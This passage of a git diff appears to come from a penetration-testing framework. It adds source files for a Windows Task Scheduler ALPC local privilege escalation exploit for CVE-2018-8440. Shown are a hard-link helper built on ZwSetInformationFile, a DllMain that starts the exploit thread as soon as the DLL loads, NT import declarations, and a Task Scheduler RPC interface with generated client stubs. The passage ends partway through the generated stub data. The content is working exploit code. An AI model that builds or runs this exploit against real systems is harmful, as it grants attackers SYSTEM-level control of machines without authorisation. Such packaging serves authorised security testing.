+	typed_buffer_ptr<FILE_LINK_INFORMATION> link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR));
+
+	memcpy(&link_info->FileName[0], full_linkname.c_str(), len);
+	link_info->ReplaceIfExists = TRUE;
+	link_info->FileNameLength = len;
+
+	std::wstring full_targetname = BuildFullPath(targetname, true);
+	
+	HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0);
+	if (hFile)
+	{
+		DEFINE_NTDLL(ZwSetInformationFile);
+		IO_STATUS_BLOCK io_status = { 0 };
+
+		NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation);
+		CloseHandle(hFile);
+		if (NT_SUCCESS(status))
+		{
+			return true;
+		}
+	}
+	
+	return false;	
+}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp
new file mode 100755
index 0000000000..89c1f29d38
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain(HMODULE hModule,
+	DWORD  ul_reason_for_call,
+	LPVOID lpReserved
+)
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(NULL, 0, ExploitThread, lpReserved, 0, NULL);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h
new file mode 100755
index 0000000000..f3a00a4e75
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h
@@ -0,0 +1,51 @@
+#pragma once
+
+#include <Windows.h>
+#include <winternl.h>
+
+#define DIRECTORY_QUERY 0x0001
+#define DIRECTORY_TRAVERSE 0x0002
+#define DIRECTORY_CREATE_OBJECT 0x0004
+#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008
+#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)
+
+typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something);
+typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
+
+#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
+
+typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
+typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength);
+typedef NTSTATUS(NTAPI* _NtOpenFile)(
+	_Out_ PHANDLE            FileHandle,
+	_In_  ACCESS_MASK        DesiredAccess,
+	_In_  POBJECT_ATTRIBUTES ObjectAttributes,
+	_Out_ PIO_STATUS_BLOCK   IoStatusBlock,
+	_In_  ULONG              ShareAccess,
+	_In_  ULONG              OpenOptions
+	);
+
+const ULONG FileLinkInformation = 11;
+
+typedef struct _FILE_LINK_INFORMATION {
+	BOOLEAN ReplaceIfExists;
+	HANDLE  RootDirectory;
+	ULONG   FileNameLength;
+	WCHAR   FileName[1];
+} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
+
+typedef NTSTATUS(__stdcall *_ZwSetInformationFile)(
+	_In_   HANDLE                 FileHandle,
+	_Out_  PIO_STATUS_BLOCK       IoStatusBlock,
+	_In_   PVOID                  FileInformation,
+	_In_   ULONG                  Length,
+	_In_   ULONG			      FileInformationClass
+	);
+typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status);
+void SetNtLastError(NTSTATUS status);
+
+#define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x)
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc.idl b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc.idl
new file mode 100755
index 0000000000..d0fddfcfc8
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc.idl
@@ -0,0 +1,166 @@
+import "oaidl.idl";
+import "ocidl.idl";
+
+[
+	uuid(86d35949-83c9-4044-b424-db363231fd0c),
+	version(1.0),
+]
+interface DefaultIfName
+{
+
+	typedef struct Struct_18_t
+	{
+		[unique][string] wchar_t* 	StructMember0;
+		[unique][string] wchar_t* 	StructMember1;
+		long 	StructMember2;
+	}Struct_18_t;
+
+	typedef struct Struct_74_t
+	{
+		long 	StructMember0;
+		long 	StructMember1;
+		[unique][string] wchar_t* 	StructMember2;
+		[unique][string] wchar_t* 	StructMember3;
+	}Struct_74_t;
+
+	typedef struct Struct_144_t
+	{
+		long 	StructMember0;
+		short 	StructMember1;
+		short 	StructMember2;
+		byte 	StructMember3[8];
+	}Struct_144_t;
+
+	typedef struct Struct_246_t
+	{
+		short 	StructMember0;
+		short 	StructMember1;
+		short 	StructMember2;
+		short 	StructMember3;
+		short 	StructMember4;
+		short 	StructMember5;
+		short 	StructMember6;
+		short 	StructMember7;
+	}Struct_246_t;
+
+	long _SchRpcHighestVersion(
+		[out]long *arg_1);
+
+	long _SchRpcRegisterTask(
+		[in][unique][string] wchar_t* arg_1,
+		[in][string] wchar_t* arg_2,
+		[in]long arg_3,
+		[in][unique][string] wchar_t* arg_4,
+		[in]long arg_5,
+		[in]long arg_6,
+		[in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_6)] /*  */ struct Struct_18_t* arg_7,
+		[out][ref][string] wchar_t** arg_8,
+		[out][ref]struct Struct_74_t** arg_9);
+
+	long SchRpcRetrieveTask(
+		[in][string] wchar_t* arg_1,
+		[in][string] wchar_t* arg_2,
+		[in]long *arg_3,
+		[out][ref][string] wchar_t** arg_4);
+
+	long _SchRpcCreateFolder(
+		[in][string] wchar_t* arg_1,
+		[in][unique][string] wchar_t* arg_2,
+		[in]long arg_3);
+
+	long _SchRpcSetSecurity(
+		[in][string] wchar_t* arg_1,
+		[in][string] wchar_t* arg_2,
+		[in]long arg_3);
+
+	long _SchRpcGetSecurity(
+		[in][string] wchar_t* arg_1,
+		[in]long arg_2,
+		[out][ref][string] wchar_t** arg_3);
+
+	long _SchRpcEnumFolders(
+		[in][string] wchar_t* arg_1,
+		[in]long arg_2,
+		[in][out]long *arg_3,
+		[in]long arg_4,
+		[out]long *arg_5,
+		[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /*  */[string] wchar_t*** arg_6);
+
+	long _SchRpcEnumTasks(
+		[in][string] wchar_t* arg_1,
+		[in]long arg_2,
+		[in][out]long *arg_3,
+		[in]long arg_4,
+		[out]long *arg_5,
+		[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /*  */[string] wchar_t*** arg_6);
+
+	long _SchRpcEnumInstances(
+		[in][unique][string] wchar_t* arg_1,
+		[in]long arg_2,
+		[out]long *arg_3,
+		[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_3)] /*  */ struct Struct_144_t** arg_4);
+
+	long _SchRpcGetInstanceInfo(
+		[in]struct Struct_144_t* arg_1,
+		[out][ref][string] wchar_t** arg_2,
+		[out]long *arg_3,
+		[out][ref][string] wchar_t** arg_4,
+		[out][ref][string] wchar_t** arg_5,
+		[out]long *arg_6,
+		[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /*  */ struct Struct_144_t** arg_7,
+		[out]long *arg_8);
+
+	long _SchRpcStopInstance(
+		[in]struct Struct_144_t* arg_1,
+		[in]long arg_2);
+
+	long _SchRpcStop(
+		[in][unique][string] wchar_t* arg_1,
+		[in]long arg_2);
+
+	long _SchRpcRun(
+		[in][string] wchar_t* arg_1,
+		[in]long arg_2,
+		[in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_2)] /*  */[string] wchar_t** arg_3,
+		[in]long arg_4,
+		[in]long arg_5,
+		[in][unique][string] wchar_t* arg_6,
+		[out]struct Struct_144_t* arg_7);
+
+	long _SchRpcDelete(
+		[in][string] wchar_t* arg_1,
+		[in]long arg_2);
+
+	long _SchRpcRename(
+		[in][string] wchar_t* arg_1,
+		[in][string] wchar_t* arg_2,
+		[in]long arg_3);
+
+	long _SchRpcScheduledRuntimes(
+		[in][string] wchar_t* arg_1,
+		[in][unique]struct Struct_246_t* arg_2,
+		[in][unique]struct Struct_246_t* arg_3,
+		[in]long arg_4,
+		[in]long arg_5,
+		[out]long *arg_6,
+		[out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /*  */ struct Struct_246_t** arg_7);
+
+	long _SchRpcGetLastRunInfo(
+		[in][string] wchar_t* arg_1,
+		[out]struct Struct_246_t* arg_2,
+		[out]long *arg_3);
+
+	long _SchRpcGetTaskInfo(
+		[in][string] wchar_t* arg_1,
+		[in]long arg_2,
+		[out]long *arg_3,
+		[out]long *arg_4);
+
+	long _SchRpcGetNumberOfMissedRuns(
+		[in][string] wchar_t* arg_1,
+		[out]long *arg_2);
+
+	long _SchRpcEnableTask(
+		[in][string] wchar_t* arg_1,
+		[in]long arg_2);
+}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c
new file mode 100755
index 0000000000..54b8360739
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c
@@ -0,0 +1,2012 @@
+
+
+/* this ALWAYS GENERATED file contains the RPC client stubs */
+
+
+ /* File created by MIDL compiler version 8.00.0603 */
+/* at Wed Sep 19 20:58:45 2018
+ */
+/* Compiler settings for rpc.idl:
+    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 
+    protocol : dce , ms_ext, c_ext, robust
+    error checks: allocation ref bounds_check enum stub_data 
+    VC __declspec() decoration level: 
+         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
+         DECLSPEC_UUID(), MIDL_INTERFACE()
+*/
+/* @@MIDL_FILE_HEADING(  ) */
+
+#if defined(_M_AMD64)
+
+
+#pragma warning( disable: 4049 )  /* more than 64k source lines */
+#if _MSC_VER >= 1200
+#pragma warning(push)
+#endif
+
+#pragma warning( disable: 4211 )  /* redefine extern to static */
+#pragma warning( disable: 4232 )  /* dllimport identity*/
+#pragma warning( disable: 4024 )  /* array to pointer mapping*/
+
+#include <string.h>
+
+#include "rpc_h.h"
+
+#define TYPE_FORMAT_STRING_SIZE   295                               
+#define PROC_FORMAT_STRING_SIZE   1207                              
+#define EXPR_FORMAT_STRING_SIZE   1                                 
+#define TRANSMIT_AS_TABLE_SIZE    0            
+#define WIRE_MARSHAL_TABLE_SIZE   0            
+
+typedef struct _rpc_MIDL_TYPE_FORMAT_STRING
+    {
+    short          Pad;
+    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_TYPE_FORMAT_STRING;
+
+typedef struct _rpc_MIDL_PROC_FORMAT_STRING
+    {
+    short          Pad;
+    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_PROC_FORMAT_STRING;
+
+typedef struct _rpc_MIDL_EXPR_FORMAT_STRING
+    {
+    long          Pad;
+    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_EXPR_FORMAT_STRING;
+
+
+static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
+{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
+
+
+extern const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString;
+extern const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString;
+extern const rpc_MIDL_EXPR_FORMAT_STRING rpc__MIDL_ExprFormatString;
+
+#define GENERIC_BINDING_TABLE_SIZE   0            
+
+
+/* Standard interface: DefaultIfName, ver. 1.0,
+   GUID={0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}} */
+
+
+
+static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =
+    {
+    sizeof(RPC_CLIENT_INTERFACE),
+    {{0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}},{1,0}},
+    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
+    0,
+    0,
+    0,
+    0,
+    0,
+    0x00000000
+    };
+RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;
+
+extern const MIDL_STUB_DESC DefaultIfName_StubDesc;
+
+static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;
+
+
+long _SchRpcHighestVersion( 
+    /* [in] */ handle_t IDL_handle,
+    /* [out] */ long *arg_1)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[0],
+                  IDL_handle,
+                  arg_1);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcRegisterTask( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][unique][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3,
+    /* [string][unique][in] */ wchar_t *arg_4,
+    /* [in] */ long arg_5,
+    /* [in] */ long arg_6,
+    /* [size_is][unique][in] */ struct Struct_18_t *arg_7,
+    /* [string][ref][out] */ wchar_t **arg_8,
+    /* [ref][out] */ struct Struct_74_t **arg_9)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[42],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4,
+                  arg_5,
+                  arg_6,
+                  arg_7,
+                  arg_8,
+                  arg_9);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long SchRpcRetrieveTask( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long *arg_3,
+    /* [string][ref][out] */ wchar_t **arg_4)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[132],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcCreateFolder( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][unique][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[192],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcSetSecurity( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[246],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcGetSecurity( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [string][ref][out] */ wchar_t **arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[300],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcEnumFolders( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ long *arg_3,
+    /* [in] */ long arg_4,
+    /* [out] */ long *arg_5,
+    /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[354],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4,
+                  arg_5,
+                  arg_6);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcEnumTasks( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ long *arg_3,
+    /* [in] */ long arg_4,
+    /* [out] */ long *arg_5,
+    /* [string][size_is][size_is][ref][out] */ wchar_t ***arg_6)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[426],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4,
+                  arg_5,
+                  arg_6);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcEnumInstances( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][unique][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out] */ long *arg_3,
+    /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_4)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[498],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcGetInstanceInfo( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ struct Struct_144_t *arg_1,
+    /* [string][ref][out] */ wchar_t **arg_2,
+    /* [out] */ long *arg_3,
+    /* [string][ref][out] */ wchar_t **arg_4,
+    /* [string][ref][out] */ wchar_t **arg_5,
+    /* [out] */ long *arg_6,
+    /* [size_is][size_is][ref][out] */ struct Struct_144_t **arg_7,
+    /* [out] */ long *arg_8)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[558],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4,
+                  arg_5,
+                  arg_6,
+                  arg_7,
+                  arg_8);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcStopInstance( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ struct Struct_144_t *arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[642],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcStop( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][unique][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[690],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcRun( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [string][size_is][unique][in] */ wchar_t **arg_3,
+    /* [in] */ long arg_4,
+    /* [in] */ long arg_5,
+    /* [string][unique][in] */ wchar_t *arg_6,
+    /* [out] */ struct Struct_144_t *arg_7)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[738],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4,
+                  arg_5,
+                  arg_6,
+                  arg_7);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcDelete( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[816],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcRename( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [string][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[864],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcScheduledRuntimes( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [unique][in] */ struct Struct_246_t *arg_2,
+    /* [unique][in] */ struct Struct_246_t *arg_3,
+    /* [in] */ long arg_4,
+    /* [in] */ long arg_5,
+    /* [out] */ long *arg_6,
+    /* [size_is][size_is][ref][out] */ struct Struct_246_t **arg_7)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[918],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4,
+                  arg_5,
+                  arg_6,
+                  arg_7);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcGetLastRunInfo( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [out] */ struct Struct_246_t *arg_2,
+    /* [out] */ long *arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[996],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcGetTaskInfo( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2,
+    /* [out] */ long *arg_3,
+    /* [out] */ long *arg_4)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1050],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcGetNumberOfMissedRuns( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [out] */ long *arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1110],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long _SchRpcEnableTask( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1158],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+#if !defined(__RPC_WIN64__)
+#error  Invalid build platform for this stub.
+#endif
+
+static const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString =
+    {
+        0,
+        {
+
+	/* Procedure _SchRpcHighestVersion */
+
+			0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
+/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
+/*  8 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 12 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 14 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 16 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 18 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x2,		/* 2 */
+/* 20 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 24 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 28 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 30 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 32 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 34 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 36 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 38 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 40 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure _SchRpcRegisterTask */
+
+
+	/* Return value */
+
+/* 42 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 44 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 48 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 50 */	NdrFcShort( 0x58 ),	/* X64 Stack size/offset = 88 */
+/* 52 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 54 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 56 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 58 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 60 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
